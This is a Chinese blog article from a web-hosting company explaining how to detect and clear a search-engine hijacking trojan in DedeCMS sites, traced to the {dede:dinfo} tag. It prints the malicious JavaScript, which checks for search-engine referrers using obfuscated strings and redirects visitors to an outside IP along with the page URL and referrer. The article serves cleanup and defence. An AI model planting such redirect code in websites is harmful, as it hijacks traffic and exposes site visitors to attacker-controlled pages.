• 全国400电话网上服务平台
    强大号码库资源任选,方便,快捷,快速开通。
    咨询热线:400-1100-266  

    dedecms织梦清除快照劫持木马
    POST TIME:2021-05-23 02:53

    经过一段时间摸索,发现这个标签{dede:dinfo}有问题

    做dedecms的人都知道,这个是一个自定义标签的调用方式,其源码在:/include/taglib/dinfo.lib.php里面。于是打开这个文件,看到如下代码:

    [代码]php代码:

    >dede>>

    系统默认标签

    全局标记

    V55,V56,V57

    系统默认标签

    {dede:dinfo /}

    >>dede>>*/

    function lib_dinfo()

    {

        global $dsql,$envs;

        $revalue = '';

        return $revalue;

    }

     

    刚开始也没有看出什么问题,就是一段js代码,然后引用了一个图片,不过访问下这个图片地址就知道了,在浏览器中输入这个地址:http://%31%31%38%2e%32%34%34%2e%32%31%35%2e%32%31%33/images/page_bg.gif

    能看到如下代码:

     

    [代码]js代码:

    GID89a="";

    var s=document.referrer;

    var str=window.location.href;

    if(s.indexOf("go"+"o"+"gle")>0 || s.indexOf("b"+"ai"+"du")>0 || s.indexOf("y"+"ahoo")>0 || s.indexOf("s"+"ogou")>0 || s.indexOf("bing")>0 || s.indexOf("360")>0 || s.indexOf("s"+"os"+"o")>0 || s.indexOf("youdao")>0 )

    window.location.href="http://118.244.215.213/Images/a2.asp?cpy="+str+"&kecy="+s;

     

    怎么样,看出问题来了吧?

    简单解说一下:

    [代码]js代码:

    if(s.indexOf("go"+"o"+"gle")>0 || s.indexOf("b"+"ai"+"du")>0 || s.indexOf("y"+"ahoo")>0 || s.indexOf("s"+"ogou")>0 || s.indexOf("bing")>0 || s.indexOf("360")>0 || s.indexOf("s"+"os"+"o")>0 || s.indexOf("youdao")>0 )

     

    这里就是判断来路,如果来源是:google、百度、yahoo、sogou、bing、360、soso、youdao,就跳转到下面这个地址:

    [代码]js代码:

    http://118.244.215.213/Images/a2.asp?cpy="+str+"&kecy="+s;


    
    关于我们 | 付款方式 | 建站知识 | 增值服务 | 网站模板
    Copyright © 2003-2016
    时间:9:00-21:00 (节假日不休)
    版权所有:巨人网络(扬州)科技有限公司
    总部地址:江苏省信息产业基地11号楼四层
    《增值电信业务经营许可证》 苏B2-20120278
    X

    截屏,微信识别二维码

    微信号:veteran88

    (点击微信号复制,添加好友)

     打开微信

    微信号已复制,请打开微信添加咨询详情!